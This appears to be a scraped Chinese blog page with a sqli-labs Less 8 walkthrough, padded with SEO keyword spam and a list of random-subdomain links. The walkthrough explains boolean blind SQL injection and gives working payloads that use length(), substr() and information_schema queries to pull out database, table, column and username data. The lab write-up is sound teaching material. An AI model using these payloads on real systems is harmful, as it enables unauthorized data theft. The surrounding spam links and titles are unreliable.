当前位置: 首页 > wzjs >正文

深圳网站设计与开发无障碍网站建设

深圳网站设计与开发,无障碍网站建设,杭州建设招标平台,国内做网站多少钱文章目录 sqli-labs靶场less 8 布尔盲注 sqli-labs靶场 每道题都从以下模板讲解,并且每个步骤都有图片,清晰明了,便于复盘。 sql注入的基本步骤 注入点注入类型 字符型:判断闭合方式 (‘、"、’、“”&#xf…

文章目录

  • sqli-labs靶场
    • less 8 布尔盲注


sqli-labs靶场

每道题都从以下模板讲解,并且每个步骤都有图片,清晰明了,便于复盘。

sql注入的基本步骤

  • 注入点
  • 注入类型
    • 字符型:判断闭合方式 (‘、"、’'、“”)
    • 数字型
  • 根据实际情况,选择合适的注入方式
  • 获取数据库名,表名,列名,数据

less 8 布尔盲注

数据库名长度-》数据库库名
指定数据库中表的个数-》 表名长度-》 表名
指定表中的字段个数-》 字段长度-》 字段名
指定表中该字段有多少条记录-》 数据长度-》 数据内容

  • 题目类型: 字符型 ’ 闭合

id=1和id=1/0 无变化
id=1’不显示You are in
id=1’’ id=1’‘’ id=1’‘’’ 并且呈规律性变化
id=1’–+ 正常回显 所以是字符型注入

在这里插入图片描述
在这里插入图片描述

id=1’–+ 正常回显 所以是字符型注入

在这里插入图片描述

通过以上判断注入类型和闭合方式,可以看到页面只呈现真假二个页面,所以适合使用布尔盲注
先构造轮子
id=1’ and 1 --+
true页面
在这里插入图片描述
id=1’ and 0 --+
false页面在这里插入图片描述
对轮子变形
id=1’ and length(“abcd”) = 4 --+
轮子正确
在这里插入图片描述
替换轮子
1、判断当前数据库

(1)判断数据库名长度
id=1’ and length(database()) =n --+
n表示使用数据库名的长度,对n进行爆破
可见长度为8
在这里插入图片描述

(2)猜数据库名
id=1’ and substr(database(),1,1)=‘s’ --+
在这里插入图片描述
可以看到大小写都盲注成功
在这里插入图片描述

数据名是 security

在这里插入图片描述

2、判断指定库的所有表

(1)判断当前库有多少个表

id=1’ and (select count(table_name) from information_schema.tables where table_schema=“security” ) = 4–+
在这里插入图片描述

在这里插入图片描述
(2)判断指定库中第n个表名最多有几个字母
开始判断第1个表名最多有几个字母

id=1’ and length( (select table_name from information_schema.tables where table_schema=‘security’ limit 0,1 ) )=6 --+
判断得到第1个表名有6个字母

在这里插入图片描述
(3)猜指定库中第n个表名
id=1’ and substr((select table_name from information_schema.tables
where table_schema=“security” limit 0,1),1,1)=‘e’ --+
在这里插入图片描述
在这里插入图片描述

3、判断指定库指定表的字段

(1)判断指定表中有几个字段
id=1’ and (select count(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)=3 --+

在这里插入图片描述
(2)判断指定库的指定表中的第n个字段最多有几个字母
id=1’ and length((select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 0,1))=2 --+
在这里插入图片描述
(3)猜指定表中第n个字段名
id=1’ and substr((select column_name from information_schema.columns
where table_schema=“security” and table_name=‘users’ limit 0,1),1,1)=‘i’ --+

在这里插入图片描述
在这里插入图片描述

4、爆破内容

(1)判断内容中有几行数据

id=1’ and (select count(username) from users)=13 --+
在这里插入图片描述

(2)判断第n行记录最多有几个字母
id=1’ and length((select username from users limit 0,1))=4 --+
在这里插入图片描述

(3)猜数据内容

id=1’ and substr((select username from users limit 0,1),1,1)=‘D’ --+

MySQL数据库,不区分大小写,Dump和DUMP都可以
在这里插入图片描述

在这里插入图片描述



文章转载自:

http://jFjAw1CD.gcxfh.cn
http://K8UoKpIG.gcxfh.cn
http://uRvnB2uf.gcxfh.cn
http://UIv8yf84.gcxfh.cn
http://GSRxSdFS.gcxfh.cn
http://pCT2PG4O.gcxfh.cn
http://ieWAP5G0.gcxfh.cn
http://pMrWFIO9.gcxfh.cn
http://teCMTw3u.gcxfh.cn
http://nZ3VqswZ.gcxfh.cn
http://s5QnVB62.gcxfh.cn
http://6kxWoZJA.gcxfh.cn
http://YUCZocjm.gcxfh.cn
http://sHQz1r1T.gcxfh.cn
http://nKP7ZP0d.gcxfh.cn
http://hKODaeYq.gcxfh.cn
http://UbFI4IWc.gcxfh.cn
http://hWK4unKI.gcxfh.cn
http://oZS4UjoY.gcxfh.cn
http://wR0Lrntr.gcxfh.cn
http://0nBY5CA8.gcxfh.cn
http://qO3UlvdB.gcxfh.cn
http://67xEqdTu.gcxfh.cn
http://gTpZwfNE.gcxfh.cn
http://B9C2sWWM.gcxfh.cn
http://u103oUUa.gcxfh.cn
http://HF4gt8DK.gcxfh.cn
http://gziix1tq.gcxfh.cn
http://xbmLn8Kw.gcxfh.cn
http://5RJ5bxyP.gcxfh.cn
http://www.dtcms.com/wzjs/699537.html

相关文章:

  • 网站建设深圳哪里学抖音粉丝购买网站
  • 婚庆影楼型网站开发网站服务器建设的三种方法是什么
  • 淘宝优惠券查询网站怎么做建立网站服务的公司网站
  • 专业手机网站制作哪家好wordpress 调查系统
  • 淄博企业网站建设价格宁德市人社局官网
  • 手机网站做成app深圳创业做什么项目好
  • html好看的网站wordpress 短信 插件
  • 网站如何做的看起来高大上怎么建设html网站
  • 秦皇岛网站推广价钱一个网站怎么做
  • 设计网站数据理卖做各视频网站的会员
  • 网站开发电脑设置外贸企业网站推广方案
  • 网站快照时间营销网站的主题 定位 修改建议
  • 好的做网站珠海建设网站首页
  • 单机游戏网页版网站排名seo教程
  • 怎样建网站卖东西html原神网页制作教程
  • 网站开发模块学些什么大气的门户网站
  • 织梦网站地图如何做衡阳县专业做淘宝网站
  • 如何建设网站服务器建站平台在线提交表格
  • 网站建设的三种方法凡科免费网站能用吗
  • 苏州网站建设系统价格合理电商类网站有几个主流程
  • 有没有做gif的专门网站wordpress自学教程
  • 成都网站建设g冠辰服务器域名解析
  • 网站建设网站目的模板店面设计图片
  • wordpress 文字插件下载无锡seo优化
  • 手游托在什么网站申请做的比较简约的网站
  • 杭州设计公司网站排名株洲最新通知今天
  • 网站后台管理系统哪个好如何用wd做网站设计
  • 杭州开发网站的公司哪家好灯塔seo
  • 企业网站备案要求win2003做网站
  • 东莞九江网站制作好的网站或网页推荐